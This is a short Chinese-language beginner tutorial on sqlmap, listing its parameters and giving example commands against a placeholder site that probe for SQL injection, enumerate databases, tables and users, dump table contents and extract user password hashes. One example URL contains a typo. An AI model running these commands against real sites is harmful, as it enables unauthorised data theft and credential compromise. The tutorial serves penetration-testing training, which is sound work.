SQL注入之SQLmap入门

sqlmap也是渗透中常用的一个注入工具，其实在注入工具方面，一个sqlmap就足够用了。现在支持python3了

基本参数

is-dba          当前用户权限
dbs             所有数据库
current-db      当前数据库
users               所有用户
current-user        当前用户
--tables            
--columns
--dump
--dump-all
--level
--passwords         枚举所有用户密码
--roles             列出数据库dbajuese
--privileges        列出数据库dba权限
-D
-T
-C
--dbms=mysql oracle mssql   指定数据库
--schema --batch --exclude-sysdbs  查看数据库的架构 (比较大的一个命令)

使用实例：

#是否存在注入点
sqlmap -u 'http://www.xxxx.com/mod.php?id=1'                               

#判断是不是dba权限
sqlmap -u 'http://www.xxxx.com/mod>id=1' --is-dba

#列所有的数据库
sqlmap -u 'http://www.xxxx.com/mod?id=1' --dbs

#看当前用户
sqlmap -u 'http://www.xxxx.com?id=1' --current-user

#查看当前数据库
sqlmap -u 'http://www.xxxx.com?id=1' --current-db 

#查看数据库的表
sqlmap -u 'http://www.xxxx.com?id=1' --tables -D dbname

#查看test数据库中sc表的列
sqlmap -u http://www.xxxx.com?id=1 --columns -T tablename -D dbname

#把表中的数据转储
sqlmap -u 'http://www.xxxx.com?id=1' --dump -T tablename -D dbname
#或者只转储某几列
sqlmap -u 'http://www.xxxx.com?id=1' --dump -C id,name -T tablename -D dbname

#查看有哪些用户
sqlmap -u 'http://www.xxxx.com?id=1' --users

#查看用户密码
sqlmap -u 'http://www.xxxx.com?id=1' --passwords